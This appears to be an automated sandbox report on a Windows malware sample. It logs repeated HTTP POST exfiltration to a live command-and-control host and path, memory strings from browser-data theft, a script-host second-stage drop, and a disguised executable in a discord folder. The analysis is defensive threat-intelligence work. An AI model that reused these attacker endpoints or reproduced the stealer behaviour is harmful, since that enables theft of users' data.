                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1772Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1064Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1064Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1060Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficDNS traffic detected: DNS query: 891781cm.renyash.ru
                                    Source: unknownHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000003190000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://891781cm.renyash.ru
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002BF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://891781cm.renyash.ru/
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000003008000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002BF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.php
                                    Source: Agentcomponentbrokermonitordhcp.exe, 00000005.00000002.1742549367.000000000313E000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002BF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drString found in binary or memory: https://www.ecosia.org/newtab/
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWindow created: window name: CLIPBRDWNDCLASS

                                    System Summary

                                    barindex
                                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_00586FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00586FAA
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0058848E0_2_0058848E
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_005840FE0_2_005840FE
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_005940880_2_00594088
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_005900B70_2_005900B7
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_005971530_2_00597153
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_005A51C90_2_005A51C9
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_005962CA0_2_005962CA
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_005832F70_2_005832F7
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_005943BF0_2_005943BF
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_005AD4400_2_005AD440
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0058F4610_2_0058F461
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0058C4260_2_0058C426
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_005977EF0_2_005977EF
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0058286B0_2_0058286B
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_005AD8EE0_2_005AD8EE
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_005B19F40_2_005B19F4
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0058E9B70_2_0058E9B7
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_00596CDC0_2_00596CDC
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_00593E0B0_2_00593E0B
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0058EFE20_2_0058EFE2
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_005A4F9A0_2_005A4F9A
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 5_2_00007FFD9B7D0D485_2_00007FFD9B7D0D48
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 5_2_00007FFD9B7D0E435_2_00007FFD9B7D0E43
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 5_2_00007FFD9BBD52D25_2_00007FFD9BBD52D2
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 5_2_00007FFD9BBCA6925_2_00007FFD9BBCA692
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 5_2_00007FFD9BBD45265_2_00007FFD9BBD4526
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 26_2_00007FFD9B7E000026_2_00007FFD9B7E0000
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 26_2_00007FFD9B7E02F226_2_00007FFD9B7E02F2
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 26_2_00007FFD9B7E02D326_2_00007FFD9B7E02D3
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 26_2_00007FFD9B7E00D326_2_00007FFD9B7E00D3
